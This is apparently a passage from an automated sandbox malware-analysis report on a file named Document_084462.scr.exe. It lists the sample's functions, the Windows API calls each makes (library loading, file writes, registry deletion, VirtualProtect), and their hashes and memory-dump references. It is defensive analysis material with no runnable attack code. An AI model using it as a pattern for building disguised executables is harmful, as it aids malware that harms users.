                                                                              • Instruction ID: 3e9f44f44444eb33be3e1f1d809517d1ef13f380758e007b8d3e22890c14ce30
                                                                              • Opcode Fuzzy Hash: 450ddb0a52dde23e6c3e7e65707e0a17b99b7c6dada291b67ac9213214883537
                                                                              • Instruction Fuzzy Hash: 0301F432624220ABE7195B389D05B2A3698E751318F10C13FF855F6AF1EA78CC02DB4D
                                                                              Function 0040242C Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033,00000002), ref: 0040244E
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00402457
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: CloseDeleteValue
                                                                              • String ID:
                                                                              • API String ID: 2831762973-0
                                                                              • Opcode ID: 3b2b3679bd27be8986a20790fb1aa9d433e7eb96043e8b231018ce36cdcb7856
                                                                              • Instruction ID: b1f28ea4fe1f397702134e154a5d50ad3aafc71d487b2ad51b946e19fd30fa70
                                                                              • Opcode Fuzzy Hash: 3b2b3679bd27be8986a20790fb1aa9d433e7eb96043e8b231018ce36cdcb7856
                                                                              • Instruction Fuzzy Hash: 3CF09672A00120ABDB10AFA89B4DAAE73B5AF45314F12443FF651B71C1DAFC5D01963E
                                                                              Function 00401EDE Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                                                              • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: Window$EnableShow
                                                                              • String ID:
                                                                              • API String ID: 1136574915-0
                                                                              • Opcode ID: a206bc09d31208a55ef0f8a5c470fd50e96019e1354e9f0dd429e4c405301b30
                                                                              • Instruction ID: a2c3742fa11dc5cf357e4fc2c1b39d3237f925362780464401897514ce5169fc
                                                                              • Opcode Fuzzy Hash: a206bc09d31208a55ef0f8a5c470fd50e96019e1354e9f0dd429e4c405301b30
                                                                              • Instruction Fuzzy Hash: 64E09A72A042009FD704EFA4AE488AEB3B4EB90325B20497FE401F20C1CBB85D00862E
                                                                              Function 00401573 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: ShowWindow
                                                                              • String ID:
                                                                              • API String ID: 1268545403-0
                                                                              • Opcode ID: ed0fba548ae3e193f0e5ef583f5be9fd2d24872a13bb97bcc89e0a3ab6842b84
                                                                              • Instruction ID: b2fefa23d47a0510f6e3c17d58d1e446f1e854612225740054352d4863a47d08
                                                                              • Opcode Fuzzy Hash: ed0fba548ae3e193f0e5ef583f5be9fd2d24872a13bb97bcc89e0a3ab6842b84
                                                                              • Instruction Fuzzy Hash: 5CE0BF76B24114ABCB18DFA8ED90C6E77B6EB95310720847AE512B3690C679AD10CB68
                                                                              Function 004067E3 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(?,00000020,?,00403514,0000000B), ref: 004067F5
                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00406810
                                                                                • Part of subcall function 00406773: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040678A
                                                                                • Part of subcall function 00406773: wsprintfW.USER32 ref: 004067C5
                                                                                • Part of subcall function 00406773: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067D9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                              • String ID:
                                                                              • API String ID: 2547128583-0
                                                                              • Opcode ID: 04b739db586b670126c7119b566f03dd1efc4ec82adb23a6bbf3e60323b3d7ce
                                                                              • Instruction ID: 99a4bc67a8c43757839ce5658996565e88f4cb2ecc15aeea03f34014f97f3c52
                                                                              • Opcode Fuzzy Hash: 04b739db586b670126c7119b566f03dd1efc4ec82adb23a6bbf3e60323b3d7ce
                                                                              • Instruction Fuzzy Hash: F2E0863350521056E611AA719D44C7773AC9F89650307843EF946F2080D738DC31ABBD
                                                                              Function 00405EE4 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\Document_084462.scr.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405EE8
                                                                              • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405F0A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: File$AttributesCreate
                                                                              • String ID:
                                                                              • API String ID: 415043291-0
                                                                              • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                              • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                                                                              • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                              • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                                                                              Function 00405EBF Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetFileAttributesW.KERNELBASE(?,?,00405AC4,?,?,00000000,00405C9A,?,?,?,?), ref: 00405EC4
                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405ED8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: AttributesFile
                                                                              • String ID:
                                                                              • API String ID: 3188754299-0
                                                                              • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                              • Instruction ID: 9f802252afbb128bb6d2778500f244350c46036787b5d1505cff2c7139ff2394
                                                                              • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                              • Instruction Fuzzy Hash: 3CD0C9725055306BC2102728EE0C89BBB55EB64271B114A35F9A5A62B0CB304C528A98
                                                                              Function 004059A2 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,00403495,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 004059A8
                                                                              • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 004059B6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: CreateDirectoryErrorLast
                                                                              • String ID:
                                                                              • API String ID: 1375471231-0
                                                                              • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                              • Instruction ID: 379133542b1e1e7011c0d69b4b2ae41cc98c6aec5a22f3063a42931ced3e53c7
                                                                              • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                              • Instruction Fuzzy Hash: 1EC04C71205502EEF6115B20DF48B1B7A909B50751F16843DA146E01E4DE389455D92D
                                                                              Function 700B2AF8 Relevance: 1.6, APIs: 1, Instructions: 143fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ReadFile.KERNELBASE(00000000), ref: 700B2BB7
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12979741278.00000000700B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 700B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.12979713482.00000000700B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12979766907.00000000700B4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12979792470.00000000700B6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_700b0000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: FileRead
                                                                              • String ID:
                                                                              • API String ID: 2738559852-0
                                                                              • Opcode ID: 169b374053034243c21d9ecba20f7c94166ac8b040e2697dcc542acb6206c7c2
                                                                              • Instruction ID: 11c122f9c3c445c78df69775a864294c2b37b34cb5dd0548be088dc1e2059869
                                                                              • Opcode Fuzzy Hash: 169b374053034243c21d9ecba20f7c94166ac8b040e2697dcc542acb6206c7c2
                                                                              • Instruction Fuzzy Hash: 13418072410284DFEB21EF75DD86B9D37B9EB04B31F308669E50586221DB3CAC818B96
                                                                              Function 00405F67 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403457,00000000,00000000,0040329E,?,00000004,00000000,00000000,00000000), ref: 00405F7B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: FileRead
                                                                              • String ID:
                                                                              • API String ID: 2738559852-0
                                                                              • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                              • Instruction ID: e146fa180a083be72d256ad1b428d57881e9eb39a1326beaade4420b40277b6a
                                                                              • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                              • Instruction Fuzzy Hash: E7E0EC3221065BAFDF10AEA59C04EFB7B6CEB05360F004836FD55E6150D635E9219BA8
                                                                              Function 00405F96 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040340D,000000FF,00793700,?,00793700,?,?,00000004,00000000), ref: 00405FAA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: FileWrite
                                                                              • String ID:
                                                                              • API String ID: 3934441357-0
                                                                              • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                              • Instruction ID: df8aade711aef2fea4c6cc03ed90c08959c6261ddae8de931081f7d2433cde5f
                                                                              • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                              • Instruction Fuzzy Hash: 96E08C3221021AEBDF109E608C00AEB7B6CEB00360F004433FA24E3150D634E8218BA8
                                                                              Function 700B29DF Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • VirtualProtect.KERNELBASE(700B505C,00000004,00000040,700B504C), ref: 700B29FD
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12979741278.00000000700B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 700B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.12979713482.00000000700B0000.00000002.00000001.01000000.00000004.sdmpDownload File
